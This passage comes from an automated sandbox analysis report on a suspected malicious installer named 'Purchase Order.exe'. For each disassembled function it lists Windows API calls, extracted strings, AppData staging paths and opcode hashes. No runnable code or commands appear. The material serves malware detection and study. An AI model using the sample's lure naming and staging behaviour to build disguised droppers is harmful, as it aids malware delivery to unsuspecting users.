                                                          • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                          Strings
                                                          • C:\Users\user\AppData\Local\potentially\Avantgarders, xrefs: 0040211D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Local\potentially\Avantgarders
                                                          • API String ID: 123533781-1472172179
                                                          • Opcode ID: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                          • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                          • Opcode Fuzzy Hash: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                          • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                          Function 004064CB Relevance: .3, Instructions: 334COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                          • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                          • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                          • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                          Function 00406CA2 Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                          • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                          • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                          • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                          Function 0040405D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                          • GetSysColor.USER32(?), ref: 0040412B
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                          • lstrlenA.KERNEL32(?), ref: 0040414C
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                          • SendMessageA.USER32(00000000), ref: 004041D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                          • SetCursor.USER32(00000000), ref: 00404258
                                                          • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                          • SetCursor.USER32(00000000), ref: 0040427B
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: (@@$Execute: $N$open
                                                          • API String ID: 3615053054-1007250702
                                                          • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                          • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                          • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                          • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,Misguidingly Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$Misguidingly Setup
                                                          • API String ID: 941294808-3467345179
                                                          • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                          • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                          • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                          • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                          Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                          • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                          • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                          • wsprintfA.USER32 ref: 00405AEF
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                          • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004059A6
                                                            • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                          • String ID: %s=%s$NUL$[Rename]
                                                          • API String ID: 222337774-4148678300
                                                          • Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                          • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                          • Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                          • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                          Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                          • GetLastError.KERNEL32 ref: 00405465
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                          • GetLastError.KERNEL32 ref: 00405484
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                          • API String ID: 3449924974-891493705
                                                          • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                          • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                          • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                          • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                          Function 00405F9A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                          • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                          Strings
                                                          • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 00405FD6
                                                          • *?|<>/":, xrefs: 00405FE2
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-4040796691
                                                          • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                          • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                          • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                          • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                          Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                          • GetSysColor.USER32(00000000), ref: 00403FB4
                                                          • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                          • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                          • GetSysColor.USER32(?), ref: 00403FDF
                                                          • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                          • DeleteObject.GDI32(?), ref: 00404009
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                          • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                          • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                          • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                          Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                          • GetMessagePos.USER32 ref: 00404836
                                                          • ScreenToClient.USER32(?,?), ref: 00404850
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                          • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                          • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                          • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                          Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                          • MulDiv.KERNEL32(0008D02A,00000064,0008DA88), ref: 00402BC5
                                                          • wsprintfA.USER32 ref: 00402BD5
                                                          • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402BCF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
